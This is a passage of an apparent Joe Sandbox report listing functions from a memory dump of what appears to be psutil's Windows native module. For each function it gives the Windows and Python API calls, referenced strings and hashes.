NtQueryInformationProcess(ProcessWow64Information), xrefs: 00007FFB9DD66BC5
automatically set for PID 0, xrefs: 00007FFB9DD66B29
OpenProcess, xrefs: 00007FFB9DD66B5A
VirtualQueryEx, xrefs: 00007FFB9DD66D69
(originated from %s), xrefs: 00007FFB9DD66BCC, 00007FFB9DD66D72
NtQueryInformationProcess(ProcessBasicInformation), xrefs: 00007FFB9DD66CAF

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseHandle$ErrorProcess$Err_LastMemory$Read$FilenameFromQueryWindowsWith$CallDeallocFunctionInformationObjectObject_OpenStatusVirtualcallocfree
String ID: (originated from %s)$NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessWow64Information)$OpenProcess$VirtualQueryEx$automatically set for PID 0
API String ID: 1900539510-2577306957
Opcode ID: c8295b2ffe7de3d488017858fedd4bab0bb80bf64b607186aeec1f4e7c62e53a
Instruction ID: 444704edb93639f26b9fc169db76a141446824ec6ba68d79161bdc7105ce7932
Opcode Fuzzy Hash: c8295b2ffe7de3d488017858fedd4bab0bb80bf64b607186aeec1f4e7c62e53a
Instruction Fuzzy Hash: 3DA162A1B08A4282EB349B77E8506BD2761FF4D788F856135DE8E47694FF3CE5498380

Function 00007FFB9DD66640 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 200
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyList_New.PYTHON3(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66665
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66690
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD6669B
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD666AA
PyErr_NoMemory.PYTHON3(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD666B8
_Py_Dealloc.PYTHON3(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD666C7
NtQuerySystemInformation.NTDLL ref: 00007FFB9DD666E2
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD666F0
HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD666FE
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66710
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66721
NtQuerySystemInformation.NTDLL ref: 00007FFB9DD6673C
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD6675B
HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66769
PyErr_SetString.PYTHON3(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66785
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD667B3
DuplicateHandle.KERNEL32 ref: 00007FFB9DD667E8

Part of subcall function 00007FFB9DD663F0: CreateThread.KERNEL32 ref: 00007FFB9DD6642B
Part of subcall function 00007FFB9DD663F0: GetLastError.KERNEL32 ref: 00007FFB9DD66439
Part of subcall function 00007FFB9DD663F0: PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD66460

PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD66839
PyList_Append.PYTHON3 ref: 00007FFB9DD66851
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD66868
GetProcessHeap.KERNEL32 ref: 00007FFB9DD6687A
HeapFree.KERNEL32 ref: 00007FFB9DD6688C
CloseHandle.KERNEL32 ref: 00007FFB9DD668A5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD668E5
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD668F5
HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66907
_Py_Dealloc.PYTHON3(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66926
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD66931
HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD6693F
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FFB9DD65183), ref: 00007FFB9DD6694C

Strings

SystemExtendedHandleInformation buffer too big, xrefs: 00007FFB9DD6677B
NtQuerySystemInformation, xrefs: 00007FFB9DD6674D

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$Process$Free$DeallocErr_Handle$AllocCloseCriticalFromInformationList_QuerySectionSystem$AppendCharCreateCurrentDuplicateEnterErrorFilenameLastLeaveMemoryStringThreadUnicode_WideWindowsWith
String ID: NtQuerySystemInformation$SystemExtendedHandleInformation buffer too big
API String ID: 3865821507-122811375
Opcode ID: c4a5de306b90e526424b4602c5ef27e05d2bd4df123f104502fd33fac498fd26
Instruction ID: b692363692a196194fe6ee5a1db410d48dbe3e979f6a9984f76b04bdb44c2f3f
Opcode Fuzzy Hash: c4a5de306b90e526424b4602c5ef27e05d2bd4df123f104502fd33fac498fd26
Instruction Fuzzy Hash: 9D9138B1B08A4681EB749B73E90837927A1BF8DBD4F856075CE9D427A4FF3DA4448380

Function 00007FFB9DD63970 Relevance: 52.8, APIs: 27, Strings: 3, Instructions: 261COMMON

Download Yara Rule

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD63992

Part of subcall function 00007FFB9DD63670: GetAdaptersAddresses.IPHLPAPI ref: 00007FFB9DD63690
Part of subcall function 00007FFB9DD63670: PyErr_SetString.PYTHON3 ref: 00007FFB9DD636AC

PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD63A1A
swprintf_s.MSPDB140-MSVCRT ref: 00007FFB9DD63A7E
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63AA6
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63B01
PyList_Append.PYTHON3 ref: 00007FFB9DD63B1B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63B32
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63B42
inet_ntop.WS2_32 ref: 00007FFB9DD63B75
ConvertLengthToIpv4Mask.IPHLPAPI ref: 00007FFB9DD63B8E
inet_ntop.WS2_32 ref: 00007FFB9DD63BB5
inet_ntop.WS2_32 ref: 00007FFB9DD63BE1
PyUnicode_FromString.PYTHON3 ref: 00007FFB9DD63BF8
PyUnicode_FromString.PYTHON3 ref: 00007FFB9DD63C19
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63C73
PyList_Append.PYTHON3 ref: 00007FFB9DD63C90
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63CA3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63CB2
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63CC8
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63CE7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD63CFF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD63D16
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63D26
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63D3A
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63D4E
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63D62
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD63D76

Strings

(OiOOOO), xrefs: 00007FFB9DD63AFA, 00007FFB9DD63C4D
%.2X-, xrefs: 00007FFB9DD63A50
%.2X, xrefs: 00007FFB9DD63A6B

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$BuildFromList_StringUnicode_Valueinet_ntop$Appendfree$AdaptersAddressesCharConvertErr_Ipv4LengthMaskWideswprintf_s
String ID: %.2X$%.2X-$(OiOOOO)
API String ID: 2354107120-528653562
Opcode ID: 6cb7d9fc68a6995530d308a66b6087f0a2fcfd18f436fba966a9198ec38cb5c8
Instruction ID: dcbfc291daf80e74fafd5f05a2aa1e2e616b420a1bc5da8764c525897ae19caf
Opcode Fuzzy Hash: 6cb7d9fc68a6995530d308a66b6087f0a2fcfd18f436fba966a9198ec38cb5c8
Instruction Fuzzy Hash: 41C16FB1B09A4A85EA309F77E84427A63A0FF5DB94F896035CA8D06764FF3DE405C780

Function 00007FFB9DD64AB0 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 166memorynativeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD64ACA
OpenProcess.KERNEL32 ref: 00007FFB9DD64AF7
GetLastError.KERNEL32 ref: 00007FFB9DD64B05
GetProcessHeap.KERNEL32 ref: 00007FFB9DD64B57
HeapAlloc.KERNEL32 ref: 00007FFB9DD64B68
NtQueryVirtualMemory.NTDLL ref: 00007FFB9DD64B93
GetProcessHeap.KERNEL32 ref: 00007FFB9DD64BA2
HeapFree.KERNEL32 ref: 00007FFB9DD64BB0
GetProcessHeap.KERNEL32 ref: 00007FFB9DD64BC2
HeapAlloc.KERNEL32 ref: 00007FFB9DD64BD3
NtQueryVirtualMemory.NTDLL ref: 00007FFB9DD64BFB
PyErr_SetString.PYTHON3 ref: 00007FFB9DD64C39
CloseHandle.KERNEL32 ref: 00007FFB9DD64C42
GetProcessHeap.KERNEL32 ref: 00007FFB9DD64C7D
HeapFree.KERNEL32 ref: 00007FFB9DD64C8B
CloseHandle.KERNEL32 ref: 00007FFB9DD64C94

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD64D29
CloseHandle.KERNEL32 ref: 00007FFB9DD64D32

Strings

automatically set for PID 0, xrefs: 00007FFB9DD64ADF
NtQueryVirtualMemory bufsize is too large, xrefs: 00007FFB9DD64C2F
psutil_pid_is_running -> 0, xrefs: 00007FFB9DD64C5B
OpenProcess, xrefs: 00007FFB9DD64B10
NtQueryVirtualMemory(MemoryWorkingSetInformation), xrefs: 00007FFB9DD64C6F
NtQueryVirtualMemory -> STATUS_ACCESS_DENIED, xrefs: 00007FFB9DD64C1A

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Heap$Process$CloseErr_HandleMemory$AllocFreeQueryVirtual$Arg_CallDeallocErrorFunctionLastObjectObject_OpenParseStringTuple
String ID: NtQueryVirtualMemory -> STATUS_ACCESS_DENIED$NtQueryVirtualMemory bufsize is too large$NtQueryVirtualMemory(MemoryWorkingSetInformation)$OpenProcess$automatically set for PID 0$psutil_pid_is_running -> 0
API String ID: 757443668-943580704
Opcode ID: b71a64530069c677a809283d696a5f1953f166047fe1c145e414f98cddc3afaf
Instruction ID: 0b9c7e22cb1a08a6caf29668e324bbb279a5068c57c0751a98b31c6a1aade18b
Opcode Fuzzy Hash: b71a64530069c677a809283d696a5f1953f166047fe1c145e414f98cddc3afaf
Instruction Fuzzy Hash: 4A614EA1F0DA4696FB309B77E85427963A1BF8DB85F856035CD8E437A4FE3CE4448680

Function 00007FFB9DD681E0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181serviceCOMMON

Download Yara Rule

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD6820F
OpenSCManagerA.ADVAPI32 ref: 00007FFB9DD6823B
GetLastError.KERNEL32 ref: 00007FFB9DD68249

Part of subcall function 00007FFB9DD61010: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6105B

PyErr_SetFromWindowsErrWithFilename.PYTHON3 ref: 00007FFB9DD68270
EnumServicesStatusExW.ADVAPI32 ref: 00007FFB9DD682BE
GetLastError.KERNEL32 ref: 00007FFB9DD682C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD682DD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD682E9
EnumServicesStatusExW.ADVAPI32 ref: 00007FFB9DD6832B
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD6836B
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD6839A
Py_BuildValue.PYTHON3 ref: 00007FFB9DD683B9
PyList_Append.PYTHON3 ref: 00007FFB9DD683D1
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD683E8
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD683F7
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD68406
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6841B
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD68474
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD68488
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6849C
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD684AC
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD684B5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD684C3

Strings

(OO), xrefs: 00007FFB9DD683AF
OpenSCManager, xrefs: 00007FFB9DD6824F
(originated from %s), xrefs: 00007FFB9DD68258

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$From$CharCloseEnumErrorHandleLastList_ServiceServicesStatusUnicode_Widefree$AppendBuildErr_FilenameManagerOpenValueWindowsWith__stdio_common_vsprintfmalloc
String ID: (OO)$(originated from %s)$OpenSCManager
API String ID: 1483861492-3715750162
Opcode ID: 0e5b709e1c71a3b6d376ad3df50edb984c2a26360f830a8c7b205a43c73c2716
Instruction ID: 198643e685ec577fab6fab1108a225a277dfa7cd46288eae34de2d26b64c9960
Opcode Fuzzy Hash: 0e5b709e1c71a3b6d376ad3df50edb984c2a26360f830a8c7b205a43c73c2716
Instruction Fuzzy Hash: C5813DB1B09B4285EA308B32E444279B3A4FF8DBA4F856135DADE427A4FF3CE5458740

Function 00007FFB9DD646C0 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD646E3

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

automatically set for PID 0, xrefs: 00007FFB9DD646F9
psutil_pid_is_running -> 0, xrefs: 00007FFB9DD6471E, 00007FFB9DD6488A
NtQuerySystemInformation, xrefs: 00007FFB9DD648A8

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Arg_CallDeallocErr_FunctionObjectObject_ParseTuple
String ID: NtQuerySystemInformation$automatically set for PID 0$psutil_pid_is_running -> 0
API String ID: 3936211163-1794217337
Opcode ID: e379bc5b234712f1f00d11cf854f2084873b799b4a562e34e8782a0d3422e626
Instruction ID: ab76b14194685123b88409a31c2e1eaf71cbd6fc9c30183ac5f972bd3fa2f5b3
Opcode Fuzzy Hash: e379bc5b234712f1f00d11cf854f2084873b799b4a562e34e8782a0d3422e626
Instruction Fuzzy Hash: 336142A2B0CB8682EB60DB67F44417A6761FF8DB84F856035DA8D43764FE3CE5458780

Function 00007FFB9DD66E80 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 130nativeCOMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON3 ref: 00007FFB9DD66EC2
OpenProcess.KERNEL32 ref: 00007FFB9DD66F02
GetLastError.KERNEL32 ref: 00007FFB9DD66F10
NtQueryInformationProcess.NTDLL ref: 00007FFB9DD66F52
CloseHandle.KERNEL32 ref: 00007FFB9DD66F6E
CloseHandle.KERNEL32 ref: 00007FFB9DD66F9F
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD66FB3
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD66FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD66FCA
NtQueryInformationProcess.NTDLL ref: 00007FFB9DD66FEF
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67029
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD67037
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67040
CloseHandle.KERNEL32 ref: 00007FFB9DD67049
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB9DD6705E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD67071
CloseHandle.KERNEL32 ref: 00007FFB9DD6707A

Strings

automatically set for PID 0, xrefs: 00007FFB9DD66EEA
OpenProcess, xrefs: 00007FFB9DD66F1B
requires Windows 8.1+, xrefs: 00007FFB9DD66EB8
NtQueryInformationProcess(ProcessCommandLineInformation), xrefs: 00007FFB9DD66FF9
NtQueryInformationProcess(ProcessBasicInformation) -> STATUS_NOT_FOUND, xrefs: 00007FFB9DD66F5F
NtQueryInformationProcess(ProcessBasicInformation), xrefs: 00007FFB9DD66F8E

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseHandle$Err_Process$InformationMemoryQuerycallocfree$ErrorLastOpenStringwcscpy_s
String ID: NtQueryInformationProcess(ProcessBasicInformation)$NtQueryInformationProcess(ProcessBasicInformation) -> STATUS_NOT_FOUND$NtQueryInformationProcess(ProcessCommandLineInformation)$OpenProcess$automatically set for PID 0$requires Windows 8.1+
API String ID: 3434980512-710783819
Opcode ID: 717a8c462aa9d2c41fc620fc9e45f7d6932c80ffe9cc37193ea9dca8e841e3a0
Instruction ID: 7a62d8496af558075f82bd90ba48dfd4c81f31e6e5817e6aec71dc44aa18d39e
Opcode Fuzzy Hash: 717a8c462aa9d2c41fc620fc9e45f7d6932c80ffe9cc37193ea9dca8e841e3a0
Instruction Fuzzy Hash: 21518CA1B0CA0282EB309B73E9542792760AF4DBD0FD46131D9DE42BA4FF3CE4498380

Function 00007FFB9DD64E30 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 163threadtimeCOMMON

Download Yara Rule

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD64E72
PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD64EA3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD64F09
CloseHandle.KERNEL32 ref: 00007FFB9DD64F17
CloseHandle.KERNEL32 ref: 00007FFB9DD64F25
Thread32First.KERNEL32 ref: 00007FFB9DD64F73
OpenThread.KERNEL32 ref: 00007FFB9DD64FB8
GetThreadTimes.KERNEL32 ref: 00007FFB9DD64FE6
Py_BuildValue.PYTHON3 ref: 00007FFB9DD65051
PyList_Append.PYTHON3 ref: 00007FFB9DD65069
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65082
CloseHandle.KERNEL32 ref: 00007FFB9DD6508B
Thread32Next.KERNEL32 ref: 00007FFB9DD65099
CloseHandle.KERNEL32 ref: 00007FFB9DD650AA
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD650CB

Part of subcall function 00007FFB9DD61180: PyObject_CallFunction.PYTHON3 ref: 00007FFB9DD611CB
Part of subcall function 00007FFB9DD61180: PyErr_SetObject.PYTHON3 ref: 00007FFB9DD611E1
Part of subcall function 00007FFB9DD61180: _Py_Dealloc.PYTHON3 ref: 00007FFB9DD611F5

Strings

Thread32First, xrefs: 00007FFB9DD64F7D
forced for PID 0, xrefs: 00007FFB9DD64EB5
CreateToolhelp32Snapshot, xrefs: 00007FFB9DD64EF3
psutil_pid_is_running -> 0, xrefs: 00007FFB9DD64ECC
GetThreadTimes, xrefs: 00007FFB9DD650D6
kdd, xrefs: 00007FFB9DD64FF8

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: CloseDeallocHandle$List_ThreadThread32$AppendArg_BuildCallErr_FirstFunctionNextObjectObject_OpenParseTimesTupleValue
String ID: CreateToolhelp32Snapshot$GetThreadTimes$Thread32First$forced for PID 0$kdd$psutil_pid_is_running -> 0
API String ID: 3176497124-1899450870
Opcode ID: 5218f5395032ed042fb60b889ae864f910d6761222d0dd7d4f2e525bf3afcb04
Instruction ID: 7d3fc9c341796dc0758977b4c995e3d38032e94b7ad0f7e301342f1e44552bf1
Opcode Fuzzy Hash: 5218f5395032ed042fb60b889ae864f910d6761222d0dd7d4f2e525bf3afcb04
Instruction Fuzzy Hash: 947175B1B0CA4286EB61DB36E450279A3A1FF9D790F846231E99E43654FF3CE445C740

Function 00007FFB9DD69A40 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 253COMMON

Download Yara Rule

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD69A75
GetLastError.KERNEL32 ref: 00007FFB9DD69AFC
swprintf_s.MSPDB140-MSVCRT ref: 00007FFB9DD69C1D
Py_BuildValue.PYTHON3 ref: 00007FFB9DD69C2D
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD69C9A
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD69DE2
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD69DF6
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD69E18
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD69E35

Strings

WTSQuerySessionInformationW, xrefs: 00007FFB9DD69DFE, 00007FFB9DD69E20
WTSEnumerateSessionsW, xrefs: 00007FFB9DD69B0B
%u.%u.%u.%u, xrefs: 00007FFB9DD69C01
OOd, xrefs: 00007FFB9DD69CF1

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$BuildCharErrorFromLastList_Unicode_ValueWideswprintf_s
String ID: %u.%u.%u.%u$OOd$WTSEnumerateSessionsW$WTSQuerySessionInformationW
API String ID: 35727893-281470548
Opcode ID: 05cac43af260b9a95e10f10a97548b1f1d4c4ccc0ce7d84133d1006f8f088dc4
Instruction ID: e1cfed305487146d12b7e118fd4d255079a75a1a2424a419f0e2e5c1a8104346
Opcode Fuzzy Hash: 05cac43af260b9a95e10f10a97548b1f1d4c4ccc0ce7d84133d1006f8f088dc4
Instruction Fuzzy Hash: D8C14CB1B09A4285EB74CF72E9502BD73B0AF49B94F841136CD9E52A94FF3CA509C780

Function 00007FFB9DD66069 Relevance: 25.7, APIs: 17, Instructions: 172processCOMMON

Download Yara Rule

APIs

PyDict_New.PYTHON3 ref: 00007FFB9DD6611F
memset.VCRUNTIME140 ref: 00007FFB9DD66135
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB9DD6614C
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD6615D
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6616C
Process32First.KERNEL32 ref: 00007FFB9DD66191
PyLong_FromLong.PYTHON3 ref: 00007FFB9DD661A4
PyLong_FromLong.PYTHON3 ref: 00007FFB9DD661BA
PyDict_SetItem.PYTHON3 ref: 00007FFB9DD661D5
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD661E8
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD661F7
Process32Next.KERNEL32 ref: 00007FFB9DD66205
CloseHandle.KERNEL32 ref: 00007FFB9DD66212
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD66255
